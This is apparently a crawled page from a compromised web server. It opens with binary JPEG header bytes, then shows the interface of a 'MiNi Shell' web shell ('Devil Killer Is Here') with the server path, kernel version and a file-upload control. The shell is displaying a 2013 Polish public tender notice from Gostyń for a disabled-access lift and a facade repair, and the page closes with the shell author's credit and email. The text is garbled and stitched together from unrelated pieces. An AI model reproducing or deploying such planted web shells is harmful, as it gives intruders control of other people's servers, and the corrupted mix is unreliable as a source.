JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130927/392082-N-2013.html

<p class="kh_header"><b>Gostyń: Budowa/montaż zewnętrznej platformy pionowej wraz z szybem do transportu osób do budynku Środowiskowego Domu Samopomocy oraz remont elewacji budynku Środowiskowego Domu Samopomocy w Gostyniu</b><br>
<b>Numer ogłoszenia: 392082 - 2013; data zamieszczenia: 27.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Wrocławska 250, 63-800 Gostyń, woj. wielkopolskie, tel. 065 5720111, 5723911, faks 065 5723911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mgops.gostyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa/montaż zewnętrznej platformy pionowej wraz z szybem do transportu osób do budynku Środowiskowego Domu Samopomocy oraz remont elewacji budynku Środowiskowego Domu Samopomocy w Gostyniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa/montaż zewnętrznej platformy pionowej wraz z szybem do transportu osób do budynku Środowiskowego Domu Samopomocy oraz remont elewacji budynku Środowiskowego Domu Samopomocy w Gostyniu;
Przedmiot zamówienia podzielony jest na dwie części 
wg niżej zamieszczonego opisu. Zamawiający dopuszcza składanie ofert częściowych: 
na obydwie części zamówienia lub jedną wybraną część
(na oddzielnych formularzach ofertowych)

miejsce wykonywania robót: Środowiskowy Dom Samopomocy, ul. Willowa 3A, 63-800 Gostyń.


Część I -  pn. Budowa/montaż zewnętrznej platformy pionowej wraz z szybem do transportu osób do budynku Środowiskowego Domu Samopomocy;
Przedmiotem inwestycji jest budowa/montaż zewnętrznej platformy pionowej wraz z szybem do transportu osób niepełnosprawnych do budynku w celu likwidacji barier architektonicznych;
Zakres robót dla całego zamierzenia: roboty rozbiórkowe, roboty wyburzeniowe, wykonanie fundamentów, wykonanie konstrukcji stalowej, wykonanie obudowy szybu, dostawa/montaż nowej platformy zewnętrznej;
Parametry techniczne oraz ogólne wytyczne budowlane do wykonania przedmiotu zamówienia zawarte są w załączonej do SIWZ dokumentacji technicznej;

Zakres przedmiotowych robót budowlanych został szczegółowo określony 
w przedmiarze załączonym do SIWZ. 


Część II - pn. Remont elewacji budynku Środowiskowego Domu Samopomocy w Gostyniu;
Prace dotyczą ocieplenia jednej ściany budynku (ściany wejściowej), nałożenia tynku, wymiany parapetów zewnętrznych, rynien i opierzenia;

Przewidziany zakres prac obejmuje m.in.:
1. oczyszczenie elewacji,
2. wykonanie ocieplenia ściany zewnętrznej,
3. wykonanie tynków cienkowarstwowych wraz z malowaniem elewacji,
4. wykonanie nowych parapetów z płytek klinkierowych,
5. wymianę rynien, rur spustowych oraz obróbek blacharskich;
6. wymiana przewodów instalacji odgromowej.

Zakres przedmiotowych robót budowlanych został szczegółowo określony 
w przedmiarze załączonym do SIWZ. 

Prace objęte cz. I i II należy wykonać zgodnie z dokumentacja techniczną (projektem budowlanym, przedmiarem robót - kosztorysem, specyfikacją techniczną wykonania 
i odbioru robót -  STWiOR), stanowiącą załącznik do niniejszej specyfikacji.

W obydwu częściach zamówienia Zamawiający dopuszcza możliwość składania ofert równoważnych.  Wszystkim wskazaniom znaków towarowych, patentów lub pochodzenia występującym w  dokumentacji technicznej (projekcie budowlanym, przedmiarze - kosztorysie, specyfikacji technicznej wykonania i odbioru robót) towarzyszy wyrazy lub równoważny, co oznacza, że dopuszcza się zastosowanie urządzeń i materiałów nie gorszych, tj. spełniających wymagania techniczne, funkcjonalne i jakościowe co najmniej takie jak wskazane w dokumentacji technicznej lub lepsze.


Warunki jakie stawia Zamawiający w przedmiotowym zamówieniu (cz. I, cz. II):

1.	Użyte przy realizacji robót materiały i wyposażenie winny spełniać wymagania określone w art. 10 Prawa budowlanego. Zamawiający wymaga, aby wszystkie urządzenia posiadały certyfikaty wydane przez akredytowane jednostki potwierdzające, 
że urządzenia są zgodne z normami.
2.	Zamawiający wymaga, aby przedmiot zamówienia był objęty min. 5-letnim okresem gwarancji/rękojmi, która rozpocznie swój bieg od daty odbioru końcowego zamówienia przez Zamawiającego.
3.	Zakres rzeczowy przedmiotowego zadania opisany jest szczegółowo w projekcie budowlanym, przedmiarze robót, specyfikacji technicznej wykonania i odbioru robót.
4.	Rozliczenia za media (woda, ścieki, energia elektryczna) nastąpią na podstawie opomiarowania poszczególnych mediów (wskazań zainstalowanych przez wykonawcę urządzeń pomiarowych) lub w formie ryczałtu stanowiącego 0,5% wartości brutto wynagrodzenia Wykonawcy. Płatność na konto M-G OPS w Gostyniu. 
5.	Przed złożeniem oferty Zamawiający zaleca dokonanie wizji lokalnej w obiekcie 
w dni powszednie w godz. od 8:00 do 15:00.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Cz. I, cz. II - Zamawiający przewiduje udzielenie zamówień uzupełniających w uzasadnionych okolicznościach, zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, na podstawie odrębnej umowy zawartej w trybie zamówienia z wolnej ręki.  Przedmiot zamówienia uzupełniającego będzie zgodny z przedmiotem zamówienia podstawowego 
i nie przekroczy łącznie 50 % wartości szacunkowej zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.30.00-4, 45.31.31.00-5, 45.00.00.00-7, 45.32.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Cz. I - Składający ofertę musi wnieść wadium, w wysokości 2.000 zł (słownie: dwa tysiące złotych 00/100);
Cz. II - Składający ofertę musi wnieść wadium, w wysokości 1.000 zł (słownie: tysiąc złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Cz. I - Zamawiający wymaga: wykazania się doświadczeniem (z okresu ostatnich 5 lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu), 
w wykonaniu zgodnie ze sztuką budowlaną robót budowlanych, polegających na budowie/montażu platformy pionowej wraz z szybem do transportu osób do budynku - dwie roboty o porównywalnym stopniu trudności każda;
Cz. II - Zamawiający wymaga: wykazania się doświadczeniem (z okresu ostatnich 5 lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu), 
w wykonaniu zgodnie ze sztuką budowlaną robót budowlanych, polegających na remoncie, budowie lub przebudowie obiektu budowlanego - dwie roboty 
o wartości nie mniejszej niż 50.000 zł (brutto) każda;
(uwaga: wymagane doświadczenie zawodowe może wynikać ze średniej wartości  wskazanych dwóch odrębnych robót budowlanych);

Ocena ww. warunku udziału w postepowaniu zostanie dokonana na podstawie analizy wymaganych / przedstawionych dokumentów (niżej wymienionych);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Cz. I, cz. II - Zamawiający wymaga dysponowania osobą z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej,
(uwaga: przynależność do Izby Inżynierów Budownictwa wymagana będzie na dzień podpisania umowy);
Ocena ww. warunku udziału w postepowaniu zostanie dokonana na podstawie analizy wymaganych / przedstawionych dokumentów (niżej wymienionych);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Cz. I - Zamawiający wymaga:
a)	posiadania środków finansowych lub zdolności kredytowej w wysokości 
co najmniej 40.000 zł (słownie: czterdzieści tysięcy złotych 00/100);
b)	posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;
Cz. II - Zamawiający wymaga:
a)	posiadania środków finansowych lub zdolności kredytowej w wysokości 
co najmniej 20.000 zł (słownie: dwadzieścia tysięcy złotych 00/100);
b)	posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;
Ocena ww. warunku udziału w postepowaniu zostanie dokonana na podstawie analizy wymaganych / przedstawionych dokumentów (niżej wymienionych);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający w cz. I wymaga przedłożenia: certyfikatu, aprobaty, atestu, karty technicznej produktu lub rekomendacji podmiotu uprawnionego do kontroli jakości dla potwierdzenia jakości oferowanej platformy;</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wraz z ofertą należy przedłożyć ponadto: pełnomocnictwo do reprezentowania firmy, jeśli dotyczy, a nie wynika ono z innych przedstawionych dokumentów, kosztorys ofertowy, dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany niniejszej umowy dopuszczone są w obydwu częściach zamówienia w granicach unormowania art. 144 ustawy Prawo zamówień publicznych, w niżej wymienionych przypadkach:
1)	zmiany danych adresowych stron, ich rachunków bankowych bądź zmiany osób wymienionych przez strony do realizacji umowy,
2)	zmiany formy prawnej prowadzenia działalności gospodarczej przez Wykonawcę,
3)	zmiany terminu wykonania zadania w przypadku wystąpienia:
a)	nieprzewidzianych okoliczności, na które wykonawca nie ma wpływu (m. in. oczekiwania na terminowo zamówione materiały),
b)	wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających realizację robót o czas ich trwania,
c)	wystąpienia konieczności wykonania prac dodatkowych, określonych odrębną umową, warunkujących prawidłowe wykonanie przedmiotu zamówienia, o czas niezbędny do ich wykonania,
d)	wystąpienia proceduralnych przesunięć wyboru wykonawcy oraz podpisania z nim umowy na realizację zamówienia o czas ich wystąpienia,
e)	wstrzymania prac z przyczyn niezależnych od Zamawiającego lub Wykonawcy, 
wskutek decyzji organów uprawnionych do wstrzymania lub przerwania robót,
f)	wystąpienia w trakcie wykonywania robót kolizji sieci mediów lub innych przeszkód, które nie wynikają z dostarczonej Wykonawcy przez Zamawiającego dokumentach.
Ww. okoliczności nie stanowią zobowiązania Zamawiającego do zmiany terminu.
4)	zmiany podmiotu trzeciego / podwykonawcy na etapie realizacji zamówienia,
5)	konieczności wprowadzenia robót zamiennych w zależności od specyfiki zamówienia,
6)	zmiany ustawowej stawki podatku VAT.
2.	Zmiany umowy mogą być dokonywane na wniosek Zamawiającego lub Wykonawcy 
i wymagają akceptacji przez obie strony umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mgops.gostyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (nieodpłatnie) można otrzymać w siedzibie Zamawiającego, otrzymać za zaliczeniem pocztowym lub pobrać w formie elektronicznej ze strony www.mgops.gostyn.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2013 godzina 12:00, miejsce: Pisemne oferty należy składać lub przesłać na adres: Miejsko-Gminny Ośrodek Pomocy Społecznej, ul. Wrocławska 250,  63-800  Gostyń (pok.  nr 101).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobą uprawnioną do kontaktów z wykonawcami jest: Violetta Skorupska,  tel./fax (65) 572 00 73, w dni powszednie w godz. od 8.00 do 15.00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa/montaż zewnętrznej platformy pionowej wraz z szybem do transportu osób do budynku Środowiskowego Domu Samopomocy;
miejsce wykonywania robót: Środowiskowy Dom Samopomocy, ul. Willowa 3A, 63-800 Gostyń;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest budowa/montaż zewnętrznej platformy pionowej wraz z szybem do transportu osób niepełnosprawnych do budynku w celu likwidacji barier architektonicznych;
Zakres robót dla całego zamierzenia: roboty rozbiórkowe, roboty wyburzeniowe, wykonanie fundamentów, wykonanie konstrukcji stalowej, wykonanie obudowy szybu, dostawa/montaż nowej platformy zewnętrznej;
Parametry techniczne oraz ogólne wytyczne budowlane do wykonania przedmiotu zamówienia zawarte są w załączonej do SIWZ dokumentacji technicznej;

Zakres przedmiotowych robót budowlanych został szczegółowo określony 
w przedmiarze załączonym do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.30.00-4, 45.31.31.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont elewacji budynku Środowiskowego Domu Samopomocy w Gostyniu;
miejsce wykonywania robót: 
Środowiskowy Dom Samopomocy, ul. Willowa 3A, 63-800 Gostyń;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace dotyczą ocieplenia jednej ściany budynku (ściany wejściowej), nałożenia tynku, wymiany parapetów zewnętrznych, rynien i opierzenia;

Przewidziany zakres prac obejmuje m.in.:
1. oczyszczenie elewacji,
2. wykonanie ocieplenia ściany zewnętrznej,
3. wykonanie tynków cienkowarstwowych wraz z malowaniem elewacji,
4. wykonanie nowych parapetów z płytek klinkierowych,
5. wymianę rynien, rur spustowych oraz obróbek blacharskich;
6. wymiana przewodów instalacji odgromowej.

Zakres przedmiotowych robót budowlanych został szczegółowo określony 
w przedmiarze załączonym do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.32.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com